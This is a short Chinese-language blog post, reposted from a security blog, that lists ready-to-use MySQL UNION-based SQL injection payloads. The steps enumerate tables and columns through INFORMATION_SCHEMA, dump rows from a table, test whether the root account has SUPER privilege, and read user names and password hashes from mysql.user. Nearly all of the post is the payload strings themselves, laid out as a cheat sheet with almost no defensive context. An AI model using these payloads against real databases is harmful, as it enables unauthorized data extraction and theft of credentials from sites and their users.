技术笔记

Mysql手工注入常用语句

字号+ 作者:雪花 来源:转载 2016-11-27 15:49 我要评论( )

1.查当前数据库 2.查表名:UNION ALL SELECT NULL,NULL,table_name,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=表名# 3. 查列名:UNION A......

1.查当前数据库
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 2.查表名:UNION ALL SELECT NULL,NULL,table_name,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='表名'#
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 3. 查列名:UNION ALL SELECT NULL,NULL,column_name,NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61727469636c65 AND table_schema=0x74657374# 
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 4.取数据:UNION ALL SELECT title,author,id,title,NULL,NULL FROM test.article#  
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 5. 权限判断:UNION ALL SELECT NULL,NULL,CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END,NULL,NULL,NULL# (ROOT权限返回1)
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top
 6.读取ROOT密码:UNION ALL SELECT NULL,password,user,NULL,NULL,NULL FROM mysql.user# 
Mysql手工注入常用语句 - sn0w - 雪花 -  root@sn0w.top

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/338.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 转大表哥安全狗SQL注入语句(176处)

    转大表哥安全狗SQL注入语句(176处)

    2017-12-05 13:47

  • Mysql注入点在limit关键字后面的利用方法

    Mysql注入点在limit关键字后面的利用方法

    2016-12-18 15:06

  • 一个罕见的MSSQL注入漏洞案例

    一个罕见的MSSQL注入漏洞案例

    2016-12-18 15:03

  • postgresql注入之文件读写

    postgresql注入之文件读写

    2016-12-13 15:25

网友点评
暂时未开启评论功能~